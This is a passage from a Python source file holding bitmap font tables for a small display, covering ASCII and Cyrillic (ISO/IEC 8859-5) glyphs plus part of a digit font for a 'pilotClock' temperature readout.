[0x007F, 0x0009, 0x0009, 0x0001, 0x0000], # 0x46 'F'
[0x003E, 0x0041, 0x0051, 0x0072, 0x0000], # 0x47 'G'
[0x007F, 0x0008, 0x0008, 0x007F, 0x0000], # 0x48 'H'
[0x007F, 0x0000], # 0x49 'I'
[0x0030, 0x0040, 0x0040, 0x003F, 0x0000], # 0x4A 'J'
[0x007F, 0x0008, 0x0014, 0x0063, 0x0000], # 0x4B 'K'
[0x007F, 0x0040, 0x0040, 0x0040, 0x0000], # 0x4C 'L'
[0x007F, 0x0002, 0x0004, 0x0002, 0x007F, 0x0000], # 0x4D 'M'
[0x007F, 0x0002, 0x0004, 0x007F, 0x0000], # 0x4E 'N'
[0x003E, 0x0041, 0x0041, 0x003E, 0x0000], # 0x4F 'O'
[0x007F, 0x0011, 0x0011, 0x000E, 0x0000], # 0x50 'P'
[0x003E, 0x0041, 0x0061, 0x00FE, 0x0000], # 0x51 'Q'
[0x007F, 0x0011, 0x0011, 0x006E, 0x0000], # 0x52 'R'
[0x0026, 0x0049, 0x0049, 0x0032, 0x0000], # 0x53 'S'
[0x0001, 0x0001, 0x007F, 0x0001, 0x0001, 0x0000], # 0x54 'T'
[0x003F, 0x0040, 0x0040, 0x003F, 0x0000], # 0x55 'U'
[0x0007, 0x0018, 0x0060, 0x0018, 0x0007, 0x0000], # 0x56 'V'
[0x001F, 0x0060, 0x0018, 0x0060, 0x001F, 0x0000], # 0x57 'W'
[0x0077, 0x0008, 0x0008, 0x0077, 0x0000], # 0x58 'X'
[0x0007, 0x0048, 0x0048, 0x003F, 0x0000], # 0x59 'Y'
[0x0071, 0x0049, 0x0045, 0x0043, 0x0000], # 0x5A 'Z'
[0x007E, 0x0042, 0x0000], # 0x5B '['
[0x0006, 0x0018, 0x0060, 0x0000], # 0x5C '\'
[0x0042, 0x007E, 0x0000], # 0x5D ']'
[0x0004, 0x0002, 0x0004, 0x0000], # 0x5E '^'
[0x0040, 0x0040, 0x0040, 0x0000], # 0x5F '_'
[0x0001, 0x0002, 0x0000], # 0x60 '`'
[0x0038, 0x0044, 0x0024, 0x007C, 0x0000], # 0x61 'a'
[0x007F, 0x0048, 0x0044, 0x0038, 0x0000], # 0x62 'b'
[0x0038, 0x0044, 0x0044, 0x0028, 0x0000], # 0x63 'c'
[0x0038, 0x0044, 0x0048, 0x007F, 0x0000], # 0x64 'd'
[0x0038, 0x0054, 0x0054, 0x0058, 0x0000], # 0x65 'e'
[0x007E, 0x0009, 0x0002, 0x0000], # 0x66 'f'
[0x0038, 0x0144, 0x0148, 0x00FC, 0x0000], # 0x67 'g'
[0x007F, 0x0008, 0x0004, 0x0078, 0x0000], # 0x68 'h'
[0x007D, 0x0000], # 0x69 'i'
[0x0080, 0x0100, 0x00FD, 0x0000], # 0x6A 'j'
[0x007F, 0x0010, 0x0028, 0x0044, 0x0000], # 0x6B 'k'
[0x003F, 0x0040, 0x0000], # 0x6C 'l'
[0x007C, 0x0004, 0x007C, 0x0004, 0x0078, 0x0000], # 0x6D 'm'
[0x007C, 0x0008, 0x0004, 0x0078, 0x0000], # 0x6E 'n'
[0x0038, 0x0044, 0x0044, 0x0038, 0x0000], # 0x6F 'o'
[0x01FC, 0x0048, 0x0044, 0x0038, 0x0000], # 0x70 'p'
[0x0038, 0x0044, 0x0048, 0x01FC, 0x0000], # 0x71 'q'
[0x007C, 0x0008, 0x0004, 0x0008, 0x0000], # 0x72 'r'
[0x0048, 0x0054, 0x0054, 0x0020, 0x0000], # 0x73 's'
[0x0004, 0x003F, 0x0044, 0x0020, 0x0000], # 0x74 't'
[0x003C, 0x0040, 0x0020, 0x007C, 0x0000], # 0x75 'u'
[0x000C, 0x0030, 0x0040, 0x0030, 0x000C, 0x0000], # 0x76 'v'
[0x003C, 0x0040, 0x0030, 0x0040, 0x003C, 0x0000], # 0x77 'w'
[0x006C, 0x0010, 0x0010, 0x006C, 0x0000], # 0x78 'x'
[0x001C, 0x0120, 0x0120, 0x00FC, 0x0000], # 0x79 'y'
[0x0064, 0x0054, 0x004C, 0x0044, 0x0000], # 0x7A 'z'
[0x0010, 0x006C, 0x0082, 0x0000], # 0x7B '{'
[0x007F, 0x0000], # 0x7C '|'
[0x0082, 0x006C, 0x0010, 0x0000], # 0x7D '}'
[0x0004, 0x0002, 0x0004, 0x0002, 0x0000], # 0x7E '~'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x7F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x80
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x81
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x82
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x83
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x84
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x85
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x86
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x87
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x88
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x89
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x90
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x91
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x92
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x93
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x94
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x95
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x96
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x97
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x98
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x99
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA0 NBSP
[0x007F, 0x0049, 0x0049, 0x0041, 0x0000], # 0xA1 'Ё'
[0x0001, 0x007F, 0x0049, 0x0048, 0x0030, 0x0000], # 0xA2 'Ђ'
[0x007C, 0x0006, 0x0005, 0x0004, 0x0000], # 0xA3 'Ѓ'
[0x003E, 0x0049, 0x0049, 0x0022, 0x0000], # 0xA4 'Є'
[0x0026, 0x0049, 0x0049, 0x0032, 0x0000], # 0xA5 'Ѕ'
[0x007F, 0x0000], # 0xA6 'І'
[0x0001, 0x007E, 0x0001, 0x0000], # 0xA7 'Ї'
[0x0020, 0x0040, 0x003F, 0x0000], # 0xA8 'Ј'
[0x0040, 0x003E, 0x0001, 0x007F, 0x0048, 0x0048, 0x0030, 0x0000], # 0xA9 'Љ'
[0x007F, 0x0008, 0x0008, 0x007F, 0x0048, 0x0048, 0x0030, 0x0000], # 0xAA 'Њ'
[0x0001, 0x007F, 0x0009, 0x0008, 0x0070, 0x0000], # 0xAB 'Ћ'
[0x007C, 0x0012, 0x0011, 0x006C, 0x0000], # 0xAC 'Ќ'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAD SHY
[0x000C, 0x0051, 0x0051, 0x003C, 0x0000], # 0xAE 'Ў'
[0x007F, 0x01C0, 0x007F, 0x0000], # 0xAF 'Џ'
[0x0078, 0x0016, 0x0011, 0x007F, 0x0000], # 0xB0 'А'
[0x007F, 0x0049, 0x0049, 0x0031, 0x0000], # 0xB1 'Б'
[0x007F, 0x0049, 0x0049, 0x0036, 0x0000], # 0xB2 'В'
[0x007F, 0x0001, 0x0001, 0x0003, 0x0000], # 0xB3 'Г'
[0x00C0, 0x007E, 0x0041, 0x0041, 0x007F, 0x00C0, 0x0000], # 0xB4 'Д'
[0x007F, 0x0049, 0x0049, 0x0041, 0x0000], # 0xB5 'Е'
[0x0077, 0x0008, 0x007F, 0x0008, 0x0077, 0x0000], # 0xB6 'Ж'
[0x0022, 0x0041, 0x0049, 0x0036, 0x0000], # 0xB7 'З'
[0x007F, 0x0020, 0x0010, 0x007F, 0x0000], # 0xB8 'И'
[0x007F, 0x0020, 0x0010, 0x007F, 0x0000], # 0xB9 'Й'
[0x007F, 0x0008, 0x0014, 0x0063, 0x0000], # 0xBA 'К'
[0x0040, 0x003E, 0x0001, 0x007F, 0x0000], # 0xBB 'Л'
[0x007F, 0x0002, 0x000C, 0x0002, 0x007F, 0x0000], # 0xBC 'М'
[0x007F, 0x0008, 0x0008, 0x007F, 0x0000], # 0xBD 'Н'
[0x003E, 0x0041, 0x0041, 0x003E, 0x0000], # 0xBE 'О'
[0x007F, 0x0001, 0x0001, 0x007F, 0x0000], # 0xBF 'П'
[0x007F, 0x0011, 0x0011, 0x000E, 0x0000], # 0xC0 'Р'
[0x003E, 0x0041, 0x0041, 0x0022, 0x0000], # 0xC1 'С'
[0x0001, 0x0001, 0x007F, 0x0001, 0x0001, 0x0000], # 0xC2 'Т'
[0x0007, 0x0048, 0x0030, 0x000F, 0x0000], # 0xC3 'У'
[0x000E, 0x0011, 0x007F, 0x0011, 0x000E, 0x0000], # 0xC4 'Ф'
[0x0077, 0x0008, 0x0008, 0x0077, 0x0000], # 0xC5 'Х'
[0x007F, 0x0040, 0x0040, 0x007F, 0x00C0, 0x0000], # 0xC6 'Ц'
[0x0007, 0x0008, 0x0008, 0x007F, 0x0000], # 0xC7 'Ч'
[0x007F, 0x0040, 0x007F, 0x0040, 0x007F, 0x0000], # 0xC8 'Ш'
[0x007F, 0x0040, 0x007F, 0x0040, 0x007F, 0x00C0, 0x0000], # 0xC9 'Щ'
[0x0001, 0x007F, 0x0044, 0x0044, 0x0038, 0x0000], # 0xCA 'Ъ'
[0x007F, 0x0044, 0x0038, 0x0000, 0x007F, 0x0000], # 0xCB 'Ы'
[0x007F, 0x0044, 0x0044, 0x0038, 0x0000], # 0xCC 'Ь'
[0x0022, 0x0049, 0x0049, 0x003E, 0x0000], # 0xCD 'Э'
[0x007F, 0x0008, 0x003E, 0x0041, 0x003E, 0x0000], # 0xCE 'Ю'
[0x006E, 0x0011, 0x0011, 0x007F, 0x0000], # 0xCF 'Я'
[0x0038, 0x0044, 0x0024, 0x007C, 0x0000], # 0xD0 'а'
[0x003C, 0x004A, 0x004B, 0x0030, 0x0000], # 0xD1 'б'
[0x007C, 0x0054, 0x0054, 0x0028, 0x0000], # 0xD2 'в'
[0x0020, 0x0054, 0x0054, 0x0048, 0x0000], # 0xD3 'г'
[0x0038, 0x0144, 0x0144, 0x00F8, 0x0000], # 0xD4 'д'
[0x0038, 0x0054, 0x0054, 0x0018, 0x0000], # 0xD5 'е'
[0x006C, 0x0010, 0x007C, 0x0010, 0x006C, 0x0000], # 0xB6 'ж'
[0x0028, 0x0044, 0x0054, 0x0028, 0x0000], # 0xD7 'з'
[0x003C, 0x0040, 0x0020, 0x007C, 0x0000], # 0xD8 'и'
[0x003C, 0x0041, 0x0021, 0x007C, 0x0000], # 0xD9 'й'
[0x007C, 0x0010, 0x0028, 0x0044, 0x0000], # 0xDA 'к'
[0x0040, 0x0038, 0x0004, 0x007C, 0x0000], # 0xDB 'л'
[0x007C, 0x0008, 0x0010, 0x0008, 0x007C, 0x0000], # 0xDC 'м'
[0x007C, 0x0010, 0x0010, 0x007C, 0x0000], # 0xDD 'н'
[0x0038, 0x0044, 0x0044, 0x0038, 0x0000], # 0xDE 'о'
[0x007C, 0x0004, 0x0004, 0x007C, 0x0000], # 0xDF 'п'
[0x01FC, 0x0048, 0x0044, 0x0038, 0x0000], # 0xE0 'р'
[0x0038, 0x0044, 0x0044, 0x0028, 0x0000], # 0xE1 'с'
[0x0004, 0x007C, 0x0004, 0x0000], # 0xE2 'т'
[0x001C, 0x0120, 0x00C0, 0x003C, 0x0000], # 0xE3 'у'
[0x0038, 0x0044, 0x01FC, 0x0044, 0x0038, 0x0000], # 0xE4 'ф'
[0x006C, 0x0010, 0x0010, 0x006C, 0x0000], # 0xE5 'х'
[0x007C, 0x0040, 0x0040, 0x007C, 0x00C0, 0x0000], # 0xE6 'ц'
[0x000C, 0x0010, 0x0010, 0x007C, 0x0000], # 0xE7 'ч'
[0x007C, 0x0040, 0x0078, 0x0040, 0x007C, 0x0000], # 0xE8 'ш'
[0x007C, 0x0040, 0x0078, 0x0040, 0x007C, 0x00C0, 0x0000], # 0xE9 'щ'
[0x0004, 0x007C, 0x0050, 0x0050, 0x0020, 0x0000], # 0xEA 'ъ'
[0x007C, 0x0050, 0x0020, 0x0000, 0x007C, 0x0000], # 0xEB 'ы'
[0x007C, 0x0050, 0x0050, 0x0020, 0x0000], # 0xEC 'ь'
[0x0028, 0x0044, 0x0054, 0x0038, 0x0000], # 0xED 'э'
[0x007C, 0x0010, 0x0038, 0x0044, 0x0038, 0x0000], # 0xEE 'ю'
[0x0048, 0x0034, 0x0014, 0x007C, 0x0000], # 0xEF 'я'
[0x007F, 0x0002, 0x0004, 0x007F, 0x0000, 0x0001, 0x0000], # 0xF0 '№'
[0x0039, 0x0054, 0x0054, 0x0059, 0x0000], # 0xF1 'ё'
[0x0002, 0x007F, 0x000A, 0x0108, 0x00F0, 0x0000], # 0xF2 'ђ'
[0x0078, 0x000C, 0x000A, 0x0008, 0x0000], # 0xF3 'ѓ'
[0x0038, 0x0054, 0x0044, 0x0028, 0x0000], # 0xF4 'є'
[0x0048, 0x0054, 0x0054, 0x0020, 0x0000], # 0xF5 'ѕ'
[0x007D, 0x0000], # 0xF6 'і'
[0x0002, 0x0078, 0x0002, 0x0000, 0x0000], # 0xF7 'ї'
[0x0080, 0x0100, 0x00FD, 0x0000], # 0xF8 'ј'
[0x0040, 0x0038, 0x0004, 0x007C, 0x0050, 0x0050, 0x0020], # 0xF9 'љ'
[0x007C, 0x0010, 0x0010, 0x007C, 0x0050, 0x0050, 0x0020, 0x0000], # 0xFA 'њ'
[0x0002, 0x007F, 0x000A, 0x0008, 0x0070, 0x0000], # 0xFB 'ћ'
[0x007C, 0x0012, 0x0011, 0x006C, 0x0000], # 0xFC 'ќ'
[0x009A, 0x0125, 0x0149, 0x00B2, 0x0000], # 0xFD '§'
[0x0038, 0x0142, 0x0142, 0x00F8, 0x0000], # 0xFE 'ў'
[0x007C, 0x00C0, 0x007C, 0x0000], # 0xFF 'џ'
]
#: Bit patterns for the pilotClock Temperature Out, ISO/IEC 8859-5 encoding, font height = 7
THERM_DIGITS_FONT = [
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x00
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x01
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x02
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x03
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x04
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x05
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x06
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x07
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x08
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x09
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x0A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x0B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x0C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x0D
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x0E
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x0F
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x10
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x11
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x12
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x13
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x14
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x15
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x16
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x17
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x18
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x19
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x1A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x1B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x1C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x1D
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x1E
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x1F
[0x00, 0x00, 0x00], # 0x20 ' '
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x21
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x22
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x23
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x24
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x25
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x26
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x27
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x28
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x29
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x2A
[0x08, 0x1C, 0x08, 0x00], # 0x2B '+'
[0x80, 0x40, 0x00], # 0x2C ','
[0x08, 0x08, 0x08, 0x00], # 0x2D '-'
[0x40, 0x00], # 0x2E '.'
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x2F
[0x3E, 0x41, 0x41, 0x3E, 0x00], # 0x30 '0'
[0x42, 0x7F, 0x40, 0x00], # 0x31 '1'
[0x62, 0x51, 0x49, 0x46, 0x00], # 0x32 '2'
[0x22, 0x49, 0x49, 0x36, 0x00], # 0x33 '3'
[0x18, 0x16, 0x11, 0x7F, 0x00], # 0x34 '4'
[0x2F, 0x45, 0x45, 0x39, 0x00], # 0x35 '5'
[0x3E, 0x49, 0x49, 0x32, 0x00], # 0x36 '6'
[0x03, 0x61, 0x19, 0x07, 0x00], # 0x37 '7'
[0x36, 0x49, 0x49, 0x36, 0x00], # 0x38 '8'
[0x26, 0x49, 0x49, 0x3E, 0x00], # 0x39 '9'
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x3A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x3B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x3C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x3D
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x3E
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x3F
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x40
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x41
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x42
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x43
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x44
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x45
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x46
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x47
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x48
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x49
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x4A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x4B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x4C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x4D
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x4E
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x4F
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x50
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x51
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x52
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x53
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x54
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x55
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x56
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x57
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x58
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x59
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x5A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x5B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x5C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x5D
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x5E
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x5F
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x60
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x61
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x62
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x63
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x64
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x65
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x66
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x67
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x68
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x69
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x6A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x6B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x6C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x6D
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x6E
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x6F
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x70
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x71
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x72
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x73
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x74
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x75
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x76
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x77
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x78
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x79
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x7A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x7B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x7C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x7D
[0x03, 0x03, 0x00], # 0x7E '~' displayed as '°'
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x7F
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x80
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x81
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x82
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x83
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x84
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x85
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x86
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x87
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x88
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x89
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x8A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x8B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x8C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x8D
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x8E
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x8F
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x90
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x91
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x92
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x93
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x94
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x95
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x96
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x97
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x98
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x99
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x9A
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x9B
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x9C
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x9D
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x9E
[0x00, 0x00, 0x00, 0x00, 0x00], # 0x9F
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA0
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA1
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA2
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA3
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA4
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA5
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA6
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA7
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA8
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xA9
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xAA
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xAB
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xAC
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xAD
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xAE
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xAF
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB0
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB1
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB2
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB3
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB4
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB5
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB6
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB7
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB8
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xB9
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xBA
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xBB
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xBC
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xBD
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xBE
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xBF
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC0
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC1
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC2
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC3
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC4
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC5
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC6
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC7
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC8
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xC9
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xCA
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xCB
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xCC
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xCD
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xCE
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xCF
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD0
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD1
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD2
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD3
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD4
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD5
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD6
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD7
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD8
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xD9
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xDA
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xDB
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xDC
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xDD
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xDE
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xDF
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE0
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE1
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE2
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE3
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE4
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE5
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE6
